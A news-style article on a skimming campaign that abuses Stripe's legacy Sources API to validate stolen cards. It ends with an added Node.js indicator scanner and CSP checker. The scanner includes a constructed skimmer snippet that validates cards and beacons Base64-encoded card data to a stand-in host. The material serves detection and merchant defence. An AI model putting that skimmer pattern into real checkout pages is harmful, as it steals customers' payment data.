Stripe API enables skimming

Dozens of online merchants are falling victim to a skimming scheme built around a legacy Stripe API. Since August 2024, attackers have been abusing the deprecated “api.stripe[.]com/v1/sources” endpoint, which still answers requests, to validate stolen card details before exfiltrating them. Smart move. Why waste bandwidth on declined cards, right?

The campaign has already hit approximately 49 e-commerce sites, and only 15 of them have managed to remove the malicious code. The rest? Still leaking customer data like a sieve. The entry points are vulnerabilities in popular platforms such as WordPress with WooCommerce, and PrestaShop.

Here’s how it works: injected JavaScript hides the genuine Stripe payment iframe and overlays it with a convincing look-alike form. Customers type their card details into the fake, none the wiser. The skimmer submits those details to the legacy Sources endpoint, and only cards that validate are Base64-encoded and sent on to the attackers’ servers, so the operators never have to sift through dead cards. Efficient. Ruthless.

What makes detection so challenging is how these scripts blend in. They mimic legitimate code and unfold in multiple stages, with later stages unpacked at runtime. Static analysis tools? Often useless against dynamic code evaluation and obfuscation. Because the validation call goes to a real Stripe endpoint, the traffic looks like ordinary checkout activity in network logs. And the attackers’ server reads the HTTP Referer header on the request for the loader to serve a Stage 3 skimmer tailored to each targeted site’s checkout page, so fetching the script from anywhere else shows you something different. It’s like finding a needle in a digital haystack. The attackers are also expanding their horizons: there is evidence they now target Square payment forms and have added cryptocurrency payment options. Card details are exfiltrated in real time as they are entered.

The implications are serious. Businesses of every size are affected, and many don’t even realize they’ve been compromised. Small merchants are particularly exposed because they lack the security resources of larger organizations.

For merchants, the fix isn’t complicated, just inconvenient: migrate off the legacy Stripe API, audit third-party and injected scripts regularly, deploy a Content Security Policy that restricts where the checkout page may load frames and send data, and deactivate services you no longer use. Basic cybersecurity hygiene, really.
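As an added example (not code from the article, from Stripe, or from any vendor), the following Node.js script turns the indicators from the “how it works” and detection paragraphs above into a simple scan, and pairs it with a small Content Security Policy matcher that shows which checkout-page requests a strict policy lets through. The merchant origin, the allowed-host list and both sample scripts are constructed for illustration.

```javascript
// Added example: indicator scan for the Stripe overlay skimmer described in
// the article, plus a minimal CSP matcher. Not the article's or Stripe's code.
// MERCHANT_ORIGIN, ALLOWED_HOSTS and both SAMPLE_* scripts are constructed.

const MERCHANT_ORIGIN = "https://shop.example"; // assumed merchant origin

// Hosts a Stripe checkout page legitimately contacts (constructed list).
const ALLOWED_HOSTS = new Set([
  "shop.example",
  "js.stripe.com",
  "api.stripe.com",
  "m.stripe.network",
]);

// Indicators from the article: the deprecated Sources endpoint used to
// validate cards, dynamic evaluation used to unfold later stages, and
// Base64 encoding feeding a network sink aimed at a host we don't expect.
function scanScript(source) {
  const legacySourcesApi = /api\.stripe\.com\/v1\/sources\b/.test(source);
  const dynamicEval = /\b(?:eval|Function)\s*\(/.test(source);
  const usesBase64 = /\bbtoa\s*\(/.test(source);
  const networkSink = /\b(?:fetch|XMLHttpRequest|sendBeacon)\b|new\s+Image\s*\(/.test(source);

  const unknownHosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    const host = m[1].toLowerCase();
    if (!ALLOWED_HOSTS.has(host)) unknownHosts.add(host);
  }
  return {
    legacySourcesApi,
    dynamicEval,
    base64Exfil: usesBase64 && networkSink && unknownHosts.size > 0,
    unknownHosts: [...unknownHosts].sort(),
  };
}

// A strict policy for a checkout page: frames and fetch/XHR only to Stripe
// and the merchant itself; anything else falls back to default-src 'self'.
function buildCheckoutCsp() {
  return [
    "default-src 'self'",
    "script-src 'self' https://js.stripe.com",
    "frame-src https://js.stripe.com",
    "connect-src 'self' https://api.stripe.com",
    "form-action 'self'",
  ].join("; ");
}

function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

// Matches 'self', 'none', scheme sources ("https:") and host sources with an
// optional scheme and a leading "*." wildcard. Ports, nonces and hashes are
// deliberately out of scope for this example.
function sourceMatches(src, url, selfOrigin) {
  const target = new URL(url);
  if (src === "'none'") return false;
  if (src === "'self'") return target.origin === selfOrigin;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return target.protocol === src.toLowerCase();
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)$/i.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host] = m;
  if (scheme && target.protocol !== scheme.toLowerCase() + ":") return false;
  const h = target.hostname;
  return wildcard ? h.endsWith("." + host.toLowerCase()) : h === host.toLowerCase();
}

// Would a request governed by `directive` to `url` be allowed? An absent
// directive falls back to default-src; if that is absent too, nothing is blocked.
function cspAllows(policy, directive, url, selfOrigin = MERCHANT_ORIGIN) {
  const directives = parseCsp(policy);
  const sources = directives.get(directive) ?? directives.get("default-src") ?? ["*"];
  return sources.some((s) => s === "*" || sourceMatches(s, url, selfOrigin));
}

// Constructed sample with the shape the article describes: validate the card
// against the legacy endpoint, then beacon the hits out, Base64-encoded.
const SAMPLE_SKIMMER = `
  fetch("https://api.stripe.com/v1/sources", { method: "POST", body: form })
    .then(r => r.json())
    .then(s => { if (s.id) new Image().src =
      "https://static-cdn.example.net/p.gif?d=" + btoa(JSON.stringify(card)); });
`;

// Constructed benign checkout script: Stripe.js plus a first-party call.
const SAMPLE_BENIGN = `
  const stripe = Stripe(PUBLISHABLE_KEY);
  const elements = stripe.elements();
  fetch("https://shop.example/api/create-payment-intent", { method: "POST" });
`;

console.log(scanScript(SAMPLE_SKIMMER));
console.log(scanScript(SAMPLE_BENIGN));
console.log(cspAllows(buildCheckoutCsp(), "img-src", "https://static-cdn.example.net/p.gif"));
```

Two caveats worth keeping in mind. A skimmer injected server-side runs as first-party code, so a CSP does not stop it from executing; what the policy above stops is the beacon to a host you never allowlisted (the `new Image()` request falls under `img-src`, which here inherits `default-src 'self'`). The validation call to api.stripe.com is still allowed because the legitimate integration needs that host, which is exactly why the article says it blends into logs, so pair the policy with script auditing. Roll it out as `Content-Security-Policy-Report-Only` first and watch the reports before enforcing.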

But until more sites wake up to the threat, customers’ card data will continue flowing straight into criminals’ hands. Just another day in e-commerce.
